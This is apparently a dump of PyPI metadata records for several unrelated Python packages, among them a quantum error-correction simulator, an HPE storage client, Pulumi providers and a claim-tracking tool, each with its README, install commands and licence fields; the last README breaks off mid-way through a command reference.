- Python packages: `cupy-cuda13x`, `cuquantum-python-cu13`, `pytket-cutensornet`
**Installation:** See the comprehensive [CUDA Setup Guide](docs/user-guide/cuda-setup.md) for detailed step-by-step instructions.
**Quick install** (after installing CUDA Toolkit):
```bash
uv pip install quantum-pecos[cuda]
# For development with CUDA support:
make build-cuda # Build with CUDA
make devc # Full dev cycle (clean + build-cuda + test)
make devcl # Dev cycle + linting
```
**Note:** When using `uv` or `pip`, install CUDA Toolkit via system package manager (e.g., `sudo apt install cuda-toolkit-13`), then install Python packages. Conda environments may conflict with `uv`/`venv` workflows.
## Uninstall
To uninstall:
```sh
pip uninstall quantum-pecos
```
## Citing
For publications utilizing PECOS, kindly cite PECOS such as:
```bibtex
@misc{pecos,
author={Ciar\'{a}n Ryan-Anderson},
title={PECOS: Performance Estimator of Codes On Surfaces},
publisher = {GitHub},
journal = {GitHub repository},
howpublished={\url{https://github.com/PECOS-packages/PECOS}},
URL = {https://github.com/PECOS-packages/PECOS},
year={2018}
}
```
And/or the PhD thesis PECOS was first described in:
```bibtex
@phdthesis{crathesis,
author={Ciar\'{a}n Ryan-Anderson},
school = {University of New Mexico},
title={Quantum Algorithms, Architecture, and Error Correction},
journal={arXiv:1812.04735},
URL = {https://digitalrepository.unm.edu/phyc_etds/203},
year={2018}
}
```
You can also use the [Zenodo DOI](https://zenodo.org/records/13700104), which would result in a bibtex like:
```bibtex
@software{pecos_[year],
author = {Ciar\'{a}n Ryan-Anderson},
title = {PECOS-packages/PECOS: [version]},
month = [month],
year = [year],
publisher = {Zenodo},
version = {[version]},
doi = {10.5281/zenodo.13700104},
url = {https://doi.org/10.5281/zenodo.13700104}
}
```
## License
This project is licensed under the Apache-2.0 License - see the [LICENSE](./LICENSE) and [NOTICE](NOTICE) files for
details.
## Supported by
[.svg)](https://www.quantinuum.com/)
| text/markdown | The PECOS Developers | null | null | Ciaran Ryan-Anderson <ciaranra@gmail.com> | Apache License Version 2.0, January 2004 http://www.apache.org/licenses/ TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 1. Definitions. "License" shall mean the terms and conditions for use, reproduction, and distribution as defined by Sections 1 through 9 of this document. "Licensor" shall mean the copyright owner or entity authorized by the copyright owner that is granting the License. "Legal Entity" shall mean the union of the acting entity and all other entities that control, are controlled by, or are under common control with that entity. For the purposes of this definition, "control" means (i) the power, direct or indirect, to cause the direction or management of such entity, whether by contract or otherwise, or (ii) ownership of fifty percent (50%) or more of the outstanding shares, or (iii) beneficial ownership of such entity. "You" (or "Your") shall mean an individual or Legal Entity exercising permissions granted by this License. "Source" form shall mean the preferred form for making modifications, including but not limited to software source code, documentation source, and configuration files. "Object" form shall mean any form resulting from mechanical transformation or translation of a Source form, including but not limited to compiled object code, generated documentation, and conversions to other media types. "Work" shall mean the work of authorship, whether in Source or Object form, made available under the License, as indicated by a copyright notice that is included in or attached to the work (an example is provided in the Appendix below). "Derivative Works" shall mean any work, whether in Source or Object form, that is based on (or derived from) the Work and for which the editorial revisions, annotations, elaborations, or other modifications represent, as a whole, an original work of authorship. 
For the purposes of this License, Derivative Works shall not include works that remain separable from, or merely link (or bind by name) to the interfaces of, the Work and Derivative Works thereof. "Contribution" shall mean any work of authorship, including the original version of the Work and any modifications or additions to that Work or Derivative Works thereof, that is intentionally submitted to Licensor for inclusion in the Work by the copyright owner or by an individual or Legal Entity authorized to submit on behalf of the copyright owner. For the purposes of this definition, "submitted" means any form of electronic, verbal, or written communication sent to the Licensor or its representatives, including but not limited to communication on electronic mailing lists, source code control systems, and issue tracking systems that are managed by, or on behalf of, the Licensor for the purpose of discussing and improving the Work, but excluding communication that is conspicuously marked or otherwise designated in writing by the copyright owner as "Not a Contribution." "Contributor" shall mean Licensor and any individual or Legal Entity on behalf of whom a Contribution has been received by Licensor and subsequently incorporated within the Work. 2. Grant of Copyright License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable copyright license to reproduce, prepare Derivative Works of, publicly display, publicly perform, sublicense, and distribute the Work and such Derivative Works in Source or Object form. 3. Grant of Patent License. 
Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable (except as stated in this section) patent license to make, have made, use, offer to sell, sell, import, and otherwise transfer the Work, where such license applies only to those patent claims licensable by such Contributor that are necessarily infringed by their Contribution(s) alone or by combination of their Contribution(s) with the Work to which such Contribution(s) was submitted. If You institute patent litigation against any entity (including a cross-claim or counterclaim in a lawsuit) alleging that the Work or a Contribution incorporated within the Work constitutes direct or contributory patent infringement, then any patent licenses granted to You under this License for that Work shall terminate as of the date such litigation is filed. 4. Redistribution. You may reproduce and distribute copies of the Work or Derivative Works thereof in any medium, with or without modifications, and in Source or Object form, provided that You meet the following conditions: (a) You must give any other recipients of the Work or Derivative Works a copy of this License; and (b) You must cause any modified files to carry prominent notices stating that You changed the files; and (c) You must retain, in the Source form of any Derivative Works that You distribute, all copyright, patent, trademark, and attribution notices from the Source form of the Work, excluding those notices that do not pertain to any part of the Derivative Works; and (d) If the Work includes a "NOTICE" text file as part of its distribution, then any Derivative Works that You distribute must include a readable copy of the attribution notices contained within such NOTICE file, excluding those notices that do not pertain to any part of the Derivative Works, in at least one of the following places: within a NOTICE text file distributed as part of the 
Derivative Works; within the Source form or documentation, if provided along with the Derivative Works; or, within a display generated by the Derivative Works, if and wherever such third-party notices normally appear. The contents of the NOTICE file are for informational purposes only and do not modify the License. You may add Your own attribution notices within Derivative Works that You distribute, alongside or as an addendum to the NOTICE text from the Work, provided that such additional attribution notices cannot be construed as modifying the License. You may add Your own copyright statement to Your modifications and may provide additional or different license terms and conditions for use, reproduction, or distribution of Your modifications, or for any such Derivative Works as a whole, provided Your use, reproduction, and distribution of the Work otherwise complies with the conditions stated in this License. 5. Submission of Contributions. Unless You explicitly state otherwise, any Contribution intentionally submitted for inclusion in the Work by You to the Licensor shall be under the terms and conditions of this License, without any additional terms or conditions. Notwithstanding the above, nothing herein shall supersede or modify the terms of any separate license agreement you may have executed with Licensor regarding such Contributions. 6. Trademarks. This License does not grant permission to use the trade names, trademarks, service marks, or product names of the Licensor, except as required for reasonable and customary use in describing the origin of the Work and reproducing the content of the NOTICE file. 7. Disclaimer of Warranty. 
Unless required by applicable law or agreed to in writing, Licensor provides the Work (and each Contributor provides its Contributions) on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied, including, without limitation, any warranties or conditions of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A PARTICULAR PURPOSE. You are solely responsible for determining the appropriateness of using or redistributing the Work and assume any risks associated with Your exercise of permissions under this License. 8. Limitation of Liability. In no event and under no legal theory, whether in tort (including negligence), contract, or otherwise, unless required by applicable law (such as deliberate and grossly negligent acts) or agreed to in writing, shall any Contributor be liable to You for damages, including any direct, indirect, special, incidental, or consequential damages of any character arising as a result of this License or out of the use or inability to use the Work (including but not limited to damages for loss of goodwill, work stoppage, computer failure or malfunction, or any and all other commercial damages or losses), even if such Contributor has been advised of the possibility of such damages. 9. Accepting Warranty or Additional Liability. While redistributing the Work or Derivative Works thereof, You may choose to offer, and charge a fee for, acceptance of support, warranty, indemnity, or other liability obligations and/or rights consistent with this License. However, in accepting such obligations, You may act only on Your own behalf and on Your sole responsibility, not on behalf of any other Contributor, and only if You agree to indemnify, defend, and hold each Contributor harmless for any liability incurred by, or claims asserted against, such Contributor by reason of your accepting any such warranty or additional liability. END OF TERMS AND CONDITIONS APPENDIX: How to apply the Apache License to your work. 
To apply the Apache License to your work, attach the following boilerplate notice, with the fields enclosed by brackets "{}" replaced with your own identifying information. (Don't include the brackets!) The text should be enclosed in the appropriate comment syntax for the file format. We also recommend that a file or class name and description of purpose be included on the same "printed page" as the copyright notice for easier identification within third-party archives. Copyright {yyyy} {name of copyright owner} Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. | PECOS, QEC, quantum, simulation | [
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"Intended Audience :: Science/Research",
"License :: OSI Approved :: Apache Software License",
"Operating System :: OS Independent",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13",
"Programming Language :: Python :: 3.14",
"Programming Language :: Python :: Implementation :: CPython",
"Topic :: Scientific/Engineering :: Physics"
] | [] | null | null | >=3.10 | [] | [] | [] | [
"guppylang>=0.21.6",
"hugr>=0.13.0",
"networkx>=2.1.0",
"pecos-rslib==0.8.0.dev3",
"phir>=0.3.3",
"selene-sim~=0.2.0",
"matplotlib>=2.2.0; extra == \"all\"",
"plotly~=5.9.0; extra == \"all\"",
"stim>=1.12.0; extra == \"all\"",
"cupy-cuda13x>=13.0.0; python_version >= \"3.11\" and extra == \"cuda\"",
"cuquantum-python-cu13>=25.3.0; python_version >= \"3.11\" and extra == \"cuda\"",
"pytket-cutensornet>=0.12.0; python_version >= \"3.11\" and extra == \"cuda\"",
"stim>=1.12.0; extra == \"stim\"",
"matplotlib>=2.2.0; extra == \"visualization\"",
"plotly~=5.9.0; extra == \"visualization\""
] | [] | [] | [] | [
"documentation, https://quantum-pecos.readthedocs.io",
"repository, https://github.com/PECOS-packages/PECOS"
] | twine/6.0.1 CPython/3.10.12 | 2026-02-20T06:47:26.342693 | quantum_pecos-0.8.0.dev3.tar.gz | 1,451,426 | 8f/4b/623e80c0254a648679adb42e22c08baa532834be5c894c84e5ce1d0e5625/quantum_pecos-0.8.0.dev3.tar.gz | source | sdist | null | false | 732f7248020b4246a211a524e0a05dbc | e7aef7a1b89bb668a6f36965e3311f99dcdcf884314417fa2c8654cb975f3c0e | 8f4b623e80c0254a648679adb42e22c08baa532834be5c894c84e5ce1d0e5625 | null | [] | 228 |
2.4 | pecos-rslib | 0.8.0.dev3 | Rust library extensions for Python PECOS. | # pecos-rslib
`pecos-rslib` provides Rust extensions for the Python version of PECOS.
| text/markdown; charset=UTF-8; variant=GFM | The PECOS Developers | null | null | Ciaran Ryan-Anderson <ciaranra@gmail.com> | null | null | [
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"Intended Audience :: Science/Research",
"License :: OSI Approved :: Apache Software License",
"Operating System :: OS Independent",
"Topic :: Scientific/Engineering :: Physics",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13",
"Programming Language :: Python :: 3.14",
"Programming Language :: Python :: Implementation :: CPython",
"Programming Language :: Rust"
] | [] | https://pecos.io | null | >=3.10 | [] | [] | [] | [] | [] | [] | [] | [] | twine/6.0.1 CPython/3.10.12 | 2026-02-20T06:47:18.633556 | pecos_rslib-0.8.0.dev3-cp310-abi3-win_amd64.whl | 36,762,757 | 7e/95/a37bb863c3f694251406f7f112f281e646b54c7d02ecf5f0d9eeb09818a5/pecos_rslib-0.8.0.dev3-cp310-abi3-win_amd64.whl | cp310 | bdist_wheel | null | false | ea83ea4d7870b9b1dcd1f1462d5d4a78 | ca767d900dde9635aaa0796c6e4b07a938456b2dd29f5cbb967d6258c6a720dc | 7e95a37bb863c3f694251406f7f112f281e646b54c7d02ecf5f0d9eeb09818a5 | null | [] | 278 |
2.4 | python-3parclient | 4.3 | HPE Alletra MP, 9000, Primera and 3PAR REST Client | # HPE Alletra 9000 and HPE Primera and HPE 3PAR REST Client
This is a client library that can talk to HPE Alletra 9000, Primera, and 3PAR
storage arrays. These arrays expose both a REST web service interface and a
command line interface, and this client library implements a simple interface
for talking with either, as needed. The Python Requests library is used to
communicate with the REST interface.
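As a sketch of typical usage (the hostname, credentials, CPG, and volume names below are placeholders; the client class and method names follow the package's documented WSAPI interface):

```python
def gib_to_mib(gib: int) -> int:
    """The WSAPI expresses volume sizes in MiB; convert from GiB."""
    return gib * 1024

def create_demo_volume():
    # Deferred import so this sketch can be read without the package installed.
    from hpe3parclient import client, exceptions

    cl = client.HPE3ParClient("https://array.example.com:8080/api/v1")
    try:
        cl.login("user", "password")
        # Create a 10 GiB volume in the (placeholder) CPG "demo_cpg".
        cl.createVolume("demo_vol", "demo_cpg", gib_to_mib(10))
    except exceptions.HTTPConflict:
        print("Volume already exists")
    finally:
        cl.logout()
```

Calling `create_demo_volume()` requires a reachable array and valid credentials.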
# Requirements
HPE 3PAR: 3.1.3 MU1 or later.
HPE Primera: 4.3.1 or later.
HPE Alletra 9000: 9.3.0 or later.
HPE 3PAR File Persona: 3.2.1 Build 46 or later.
# Capabilities
* Create Volume
* Delete Volume
* Get all Volumes
* Get a Volume
* Modify a Volume
* Copy a Volume
* Create a Volume Snapshot
* Create CPG
* Delete CPG
* Get all CPGs
* Get a CPG
* Get a CPG’s Available Space
* Create a VLUN
* Delete a VLUN
* Get all VLUNs
* Get a VLUN
* Create a Host
* Delete a Host
* Get all Hosts
* Get a Host
* Get VLUNs for a Host
* Find a Host
* Find a Host Set for a Host
* Get all Host Sets
* Get a Host Set
* Create a Host Set
* Delete a Host Set
* Modify a Host Set
* Get all Ports
* Get iSCSI Ports
* Get FC Ports
* Get IP Ports
* Set Volume Metadata
* Get Volume Metadata
* Get All Volume Metadata
* Find Volume Metadata
* Remove Volume Metadata
* Create a Volume Set
* Delete a Volume Set
* Modify a Volume Set
* Get a Volume Set
* Get all Volume Sets
* Find one Volume Set containing a specified Volume
* Find all Volume Sets containing a specified Volume
* Create a QOS Rule
* Modify a QOS Rule
* Delete a QOS Rule
* Set a QOS Rule
* Query a QOS Rule
* Query all QOS Rules
* Get a Task
* Get all Tasks
* Get a Patch
* Get all Patches
* Get WSAPI Version
* Get WSAPI Configuration Info
* Get Storage System Info
* Get Overall System Capacity
* Stop Online Physical Copy
* Query Online Physical Copy Status
* Stop Offline Physical Copy
* Resync Physical Copy
* Query Remote Copy Info
* Query a Remote Copy Group
* Query all Remote Copy Groups
* Create a Remote Copy Group
* Delete a Remote Copy Group
* Modify a Remote Copy Group
* Add a Volume to a Remote Copy Group
* Remove a Volume from a Remote Copy Group
* Start Remote Copy on a Remote Copy Group
* Stop Remote Copy on a Remote Copy Group
* Synchronize a Remote Copy Group
* Recover a Remote Copy Group from a Disaster
* Enable/Disable Config Mirroring on a Remote Copy Target
* Get Remote Copy Group Volumes
* Get Remote Copy Group Volume
* Admit Remote Copy Link
* Dismiss Remote Copy Link
* Start Remote Copy
* Remote Copy Service Exists Check
* Get Remote Copy Link
* Remote Copy Link Exists Check
* Admit Remote Copy Target
* Dismiss Remote Copy Target
* Target In Remote Copy Group Exists Check
* Remote Copy Group Status Check
* Remote Copy Group Status Started Check
* Remote Copy Group Status Stopped Check
* Create Schedule
* Delete Schedule
* Get Schedule
* Modify Schedule
* Suspend Schedule
* Resume Schedule
* Get Schedule Status
* Promote Virtual Copy
* Get a Flash Cache
* Create a Flash Cache
* Delete a Flash Cache
# File Persona Capabilities
* Get File Services Info
* Create a File Provisioning Group
* Grow a File Provisioning Group
* Get File Provisioning Group Info
* Modify a File Provisioning Group
* Remove a File Provisioning Group
* Create a Virtual File Server
* Get Virtual File Server Info
* Modify a Virtual File Server
* Remove a Virtual File Server
* Assign an IP Address to a Virtual File Server
* Get the Network Config of a Virtual File Server
* Modify the Network Config of a Virtual File Server
* Remove the Network Config of a Virtual File Server
* Create a File Services User Group
* Modify a File Services User Group
* Remove a File Services User Group
* Create a File Services User
* Modify a File Services User
* Remove a File Services User
* Create a File Store
* Get File Store Info
* Modify a File Store
* Remove a File Store
* Create a File Share
* Get File Share Info
* Modify a File Share
* Remove a File Share
* Create a File Store Snapshot
* Get File Store Snapshot Info
* Remove a File Store Snapshot
* Reclaim Space from Deleted File Store Snapshots
* Get File Store Snapshot Reclamation Info
* Stop or Pause a File Store Snapshot Reclamation Task
* Set File Services Quotas
* Get File Services Quota Info
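Every capability in the lists above maps onto an HTTP call against the array's WSAPI. As a rough, stdlib-only illustration of that flow — the endpoint path and payload keys here are assumptions for illustration, not guaranteed to match this client's internals — a session-login request might be built like this:

```python
import json
import urllib.request

def build_login_request(base_url, username, password):
    """Build (but do not send) a WSAPI session-key request.

    The WSAPI issues a session key from a credentials endpoint;
    the path and body keys below are assumptions for illustration.
    """
    body = json.dumps({"user": username, "password": password}).encode("utf-8")
    return urllib.request.Request(
        base_url.rstrip("/") + "/api/v1/credentials",
        data=body,
        headers={"Content-Type": "application/json"},
        method="POST",
    )

req = build_login_request("https://array.example.com:8080", "3paradm", "secret")
print(req.get_method(), req.full_url)
```

The session key returned by such a call is then passed on subsequent requests; the client library wraps all of this behind the operations listed above.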
# Installation
To install from source:
```
$ sudo pip install .
```
To install from http://pypi.org:
```
$ sudo pip install python-3parclient
```
# Unit Tests
To run all unit tests:
```
$ tox -e py27
```
To run a specific test:
```
$ tox -e py27 -- test/file.py:class_name.test_method_name
```
To run all unit tests with code coverage:
```
$ tox -e cover
```
The output of the coverage tests will be placed into the `coverage` dir.
# Folders
* docs – contains the documentation
* hpe3parclient – the actual client.py library
* test – unit tests
* samples – some sample uses
# Documentation
To build the documentation:
```
$ tox -e docs
```
To view the built documentation, point your browser to:
```
docs/html/index.html
```
# Running Simulators
The unit tests should automatically start/stop the simulators. To start
them manually, use the following commands; to stop them, use `kill`.
Starting them manually before running unit tests also lets you watch
the debug output.
* WSAPI:
```
$ python test/HPE3ParMockServer_flask.py -port 5001 -user <USERNAME> -password <PASSWORD> -debug
```
# Building wheel dist
This client supports building via the Python wheel standard.
See http://pythonwheels.com for details.
* building:
```
$ python setup.py bdist_wheel
```
* building and uploading:
```
$ python setup.py sdist bdist_wheel upload
```
| text/markdown | null | Raghavendra Tilay <raghavendra-uddhav.tilay@hpe.com> | null | null | null | null | [
"Development Status :: 5 - Production/Stable",
"Environment :: Web Environment",
"Intended Audience :: Developers",
"License :: OSI Approved :: Apache Software License",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3.8",
"Topic :: Internet :: WWW/HTTP"
] | [] | null | null | null | [] | [] | [] | [] | [] | [] | [] | [] | twine/6.1.0 CPython/3.12.3 | 2026-02-20T06:47:11.705259 | python_3parclient-4.3.tar.gz | 68,891 | 15/b7/748ad7ba136b98afa3b8e55ceb22e00053d390832bf6bd08fb50e5933c98/python_3parclient-4.3.tar.gz | source | sdist | null | false | c94d772cf49621ae7823b8effd595ce5 | 3d1559324c4c8d4599be5c8cd0023b852e972a67cbfe09a4be6e4a5de8cb9868 | 15b7748ad7ba136b98afa3b8e55ceb22e00053d390832bf6bd08fb50e5933c98 | null | [
"LICENSE"
] | 2,081 |
2.4 | pulumi-slack | 1.0.0a1771569414 | A Pulumi package for managing Slack workspaces. | # Slack Resource Provider
The Slack Provider enables you to manage Slack resources via Pulumi.
## Installing
This package is available for several languages/platforms:
### Node.js (JavaScript/TypeScript)
To use from JavaScript or TypeScript in Node.js, install using either `npm`:
```bash
npm install @pulumi/slack
```
or `yarn`:
```bash
yarn add @pulumi/slack
```
### Python
To use from Python, install using `pip`:
```bash
pip install pulumi_slack
```
### Go
To use from Go, use `go get` to grab the latest version of the library:
```bash
go get github.com/pulumi/pulumi-slack/sdk/go/...
```
### .NET
To use from .NET, install using `dotnet add package`:
```bash
dotnet add package Pulumi.Slack
```
## Configuration
The following configuration points are available for the `slack` provider:
- `slack:token` (environment: `SLACK_TOKEN`) - the token for your Slack workspace
## Reference
For detailed reference documentation, please visit [the Pulumi registry](https://www.pulumi.com/registry/packages/slack/api-docs/).
| text/markdown | null | null | null | null | Apache-2.0 | pulumi, slack, category/utility | [] | [] | null | null | >=3.9 | [] | [] | [] | [
"parver>=0.2.1",
"pulumi<4.0.0,>=3.165.0",
"semver>=2.8.1",
"typing-extensions<5,>=4.11; python_version < \"3.11\""
] | [] | [] | [] | [
"Homepage, https://www.pulumi.com",
"Repository, https://github.com/pulumi/pulumi-slack"
] | twine/6.2.0 CPython/3.11.8 | 2026-02-20T06:45:47.794858 | pulumi_slack-1.0.0a1771569414.tar.gz | 16,112 | 89/be/f298747ea0aca64640f6ad6a3a1787d24409d83fd9edeef0924af39826e4/pulumi_slack-1.0.0a1771569414.tar.gz | source | sdist | null | false | 86a968e747580f8cd25268cbb38abf8e | 8f7782a8562ea9e82d555f1f1aa6339315f2220a902b41c0d6efe7c07fe697eb | 89bef298747ea0aca64640f6ad6a3a1787d24409d83fd9edeef0924af39826e4 | null | [] | 208 |
2.4 | pulumi-random | 4.20.0a1771569444 | A Pulumi package to safely use randomness in Pulumi programs. | [](https://github.com/pulumi/pulumi-random/actions)
[](https://slack.pulumi.com)
[](https://npmjs.com/package/@pulumi/random)
[](https://badge.fury.io/nu/pulumi.random)
[](https://pypi.org/project/pulumi-random)
[](https://pkg.go.dev/github.com/pulumi/pulumi-random/sdk/v4/go)
[](https://github.com/pulumi/pulumi-random/blob/master/LICENSE)
# Random Provider
The random provider allows the safe use of randomness in a Pulumi program. This allows you to generate resource
properties, such as names, that contain randomness in a way that works with Pulumi's goal state oriented approach.
Using randomness as usual would not work well with Pulumi, because by definition, each time the program is evaluated,
a new random state would be produced, necessitating re-convergence on the goal state. This provider understands
how to work with the Pulumi resource lifecycle to accomplish randomness safely and in a way that works as desired.
## Installing
This package is available in many languages in the standard packaging formats.
### Node.js (JavaScript/TypeScript)
To use from JavaScript or TypeScript in Node.js, install using either `npm`:
$ npm install @pulumi/random
or `yarn`:
$ yarn add @pulumi/random
### Python
To use from Python, install using `pip`:
$ pip install pulumi_random
### Go
To use from Go, use `go get` to grab the latest version of the library
$ go get github.com/pulumi/pulumi-random/sdk/v4/go/...
### .NET
To use from .NET, install using `dotnet add package`:
$ dotnet add package Pulumi.Random
## Example
For example, to generate a random password, allocate a `RandomPassword` resource
and pass its `result` output property (of type `Output<string>`) to another
resource.
```typescript
import * as pulumi from "@pulumi/pulumi";
import * as aws from "@pulumi/aws";
import * as random from "@pulumi/random";
const password = new random.RandomPassword("password", {
length: 16,
overrideSpecial: "_%@",
special: true,
});
const example = new aws.rds.Instance("example", {
password: password.result,
});
```
## Reference
For further information, please visit [the random provider docs](https://www.pulumi.com/docs/intro/cloud-providers/random) or for detailed reference documentation, please visit [the API docs](https://www.pulumi.com/docs/reference/pkg/random).
| text/markdown | null | null | null | null | Apache-2.0 | pulumi, random | [] | [] | null | null | >=3.9 | [] | [] | [] | [
"parver>=0.2.1",
"pulumi<4.0.0,>=3.165.0",
"semver>=2.8.1",
"typing-extensions<5,>=4.11; python_version < \"3.11\""
] | [] | [] | [] | [
"Homepage, https://pulumi.io",
"Repository, https://github.com/pulumi/pulumi-random"
] | twine/6.2.0 CPython/3.11.8 | 2026-02-20T06:45:44.597009 | pulumi_random-4.20.0a1771569444.tar.gz | 22,741 | de/26/17aefaa54b7cfa49ca6a043d57b90697a59002106146e4b2f00116c7858c/pulumi_random-4.20.0a1771569444.tar.gz | source | sdist | null | false | 23133bd376d8521ede5f44c975685aaf | 68d114aa7cc987c8c121663d11fb35e26f95ec43fca6e1e79831f8d39e07dcd8 | de2617aefaa54b7cfa49ca6a043d57b90697a59002106146e4b2f00116c7858c | null | [] | 229 |
2.4 | realitycheck | 0.3.3 | Framework for rigorous, systematic analysis of claims, sources, predictions, and argument chains | # Reality Check
A framework for rigorous, systematic analysis of claims, sources, predictions, and argument chains.
> With so many hot takes, plausible theories, misinformation, and AI-generated content, sometimes, you need a `realitycheck`.
## Overview
Reality Check helps you build and maintain a **unified knowledge base** with:
- **Claim Registry**: Track claims with evidence levels, credence scores, and relationships
- **Source Analysis**: Structured 3-stage methodology (descriptive → evaluative → dialectical)
- **Evidence Links**: Connect claims to sources with location, quotes, and strength ratings
- **Reasoning Trails**: Document credence assignments with full epistemic provenance
- **Prediction Tracking**: Monitor forecasts with falsification criteria and status updates
- **Argument Chains**: Map logical dependencies and identify weak links
- **Semantic Search**: Find related claims across your entire knowledge base
See [realitycheck-data](https://github.com/lhl/realitycheck-data) for a public example knowledge base built with Reality Check.
## Status
**v0.3.3** - Verification Loop + Upgrade Sync Hardening: factual verification gates, `rc-db backup`, integration auto-sync; 454 tests.
[](https://pypi.org/project/realitycheck/)
## Prerequisites
- **Python 3.11+**
- **[Claude Code](https://github.com/anthropics/claude-code/)** (optional) - For plugin integration
- **[OpenAI Codex](https://github.com/openai/codex)** (optional) - For skills integration
- **[Amp](https://ampcode.com)** (optional) - For skills integration
- **[OpenCode](https://opencode.ai)** (optional) - For skills integration
## Installation
### From PyPI (Recommended)
```bash
# Install with pip
pip install realitycheck
# Or with uv (faster)
uv pip install realitycheck # installs to active venv or system Python
# Verify installation
rc-db --help
```
### From Source (Development)
```bash
# Clone the framework
git clone https://github.com/lhl/realitycheck.git
cd realitycheck
# Install dependencies with uv
uv sync
# Verify installation
REALITYCHECK_EMBED_SKIP=1 uv run pytest -v
```
### GPU Support (Optional)
The default install uses CPU-only PyTorch. For GPU-accelerated embeddings:
```bash
# NVIDIA CUDA 12.8
uv sync --extra-index-url https://download.pytorch.org/whl/cu128
# AMD ROCm 6.4
uv sync --extra-index-url https://download.pytorch.org/whl/rocm6.4
```
**AMD TheRock nightly (e.g., gfx1151 / Strix Halo):**
TheRock nightlies provide support for newer AMD GPUs not yet in stable ROCm. Replace `gfx1151` with your GPU arch.
> **Note:** TheRock support is experimental. Newer architectures (gfx1151/RDNA 3.5, gfx1200/RDNA 4) may require matching system ROCm kernel drivers. Memory allocation may work but kernel execution can fail if there's a version mismatch between pip ROCm userspace and system kernel module.
```bash
# 1. Install matching ROCm SDK (system-wide)
pip install --index-url https://rocm.nightlies.amd.com/v2/gfx1151/ "rocm[libraries]" -U
# 2. Create fresh venv with ROCm torch
rm -rf .venv && uv venv --python 3.12
VIRTUAL_ENV=$(pwd)/.venv uv pip install --index-url https://rocm.nightlies.amd.com/v2/gfx1151/ torch
VIRTUAL_ENV=$(pwd)/.venv uv pip install sentence-transformers lancedb pyarrow pyyaml tabulate
# 3. Set library path and verify
export LD_LIBRARY_PATH="$(pip show rocm-sdk-core | grep Location | cut -d' ' -f2)/_rocm_sdk_devel/lib:$LD_LIBRARY_PATH"
.venv/bin/python -c "import torch; print(torch.version.hip); print(torch.cuda.is_available())"
```
Or set `UV_EXTRA_INDEX_URL` in your shell profile for persistent configuration.
**Note:** If switching GPU backends, force reinstall torch:
```bash
rm -rf .venv && uv sync --extra-index-url <your-index-url>
```
## Quick Start
### 1. Create Your Knowledge Base
```bash
# Create a new directory for your data
mkdir my-research && cd my-research
# Initialize a Reality Check project (creates structure + database)
rc-db init-project
# This creates:
# .realitycheck.yaml - Project config
# data/realitycheck.lance/ - Database
# analysis/sources/ - For analysis documents
# tracking/ - For prediction tracking
# inbox/ - For sources to process (staging)
# reference/primary/ - Filed primary documents
# reference/captured/ - Supporting materials
```
### 2. Set Environment Variable
```bash
# Tell Reality Check where your database is
export REALITYCHECK_DATA="data/realitycheck.lance"
# Add to your shell profile for persistence:
echo 'export REALITYCHECK_DATA="data/realitycheck.lance"' >> ~/.bashrc
```
### 3. Add Your First Claim
```bash
rc-db claim add \
--text "AI training costs double annually" \
--type "[F]" \
--domain "TECH" \
--evidence-level "E2" \
--credence 0.8
# Output: Created claim: TECH-2026-001
```
### 4. Add a Source
```bash
rc-db source add \
--id "epoch-2024-training" \
--title "Training Compute Trends" \
--type "REPORT" \
--author "Epoch AI" \
--year 2024 \
--url "https://epochai.org/blog/training-compute-trends"
```
### 5. Search and Explore
```bash
# Semantic search
rc-db search "AI costs"
# List all claims
rc-db claim list --format text
# Check database stats
rc-db stats
```
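The IDs minted in the Quick Start follow a `DOMAIN-YEAR-SEQ` pattern (`TECH-2026-001` above). If you script against `rc-db` output, a tiny parser — hypothetical, not shipped with the package — can split them:

```python
import re

# DOMAIN-YEAR-SEQ, e.g. "TECH-2026-001"
CLAIM_ID = re.compile(r"^(?P<domain>[A-Z]+)-(?P<year>\d{4})-(?P<seq>\d{3})$")

def parse_claim_id(claim_id):
    """Split an ID like 'TECH-2026-001' into (domain, year, sequence)."""
    m = CLAIM_ID.match(claim_id)
    if m is None:
        raise ValueError(f"malformed claim ID: {claim_id!r}")
    return m["domain"], int(m["year"]), int(m["seq"])

print(parse_claim_id("TECH-2026-001"))  # → ('TECH', 2026, 1)
```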
## Using with Framework as Submodule
For easier access to scripts, add the framework as a git submodule:
```bash
cd my-research
git submodule add https://github.com/lhl/realitycheck.git .framework
# Now use shorter paths:
.framework/scripts/db.py claim list --format text
.framework/scripts/db.py search "AI"
```
## CLI Reference
All commands should be run with `REALITYCHECK_DATA` set.
If `REALITYCHECK_DATA` is not set, commands will only run when a default database exists at `./data/realitycheck.lance/` (and will otherwise exit with a helpful error suggesting how to set `REALITYCHECK_DATA` or create a project via `rc-db init-project`). The Claude Code plugin can also auto-resolve project config via `.realitycheck.yaml`.
```bash
# Database management
rc-db init # Initialize database tables
rc-db init-project [--path DIR] # Create new project structure
rc-db stats # Show statistics
rc-db backup [--output-dir DIR] [--prefix NAME] [--dry-run] # Create timestamped .tar.gz backup
rc-db reset # Reset database (destructive!)
# Claim operations
rc-db claim add --text "..." --type "[F]" --domain "TECH" --evidence-level "E3"
rc-db claim ticket --domain "TECH" [--count N] # Reserve monotonic IDs for drafting/import
rc-db claim ticket release --abandoned --older-than-days 7 # Clean abandoned reservations
rc-db claim add --id "TECH-2026-001" --text "..." ... # With explicit ID
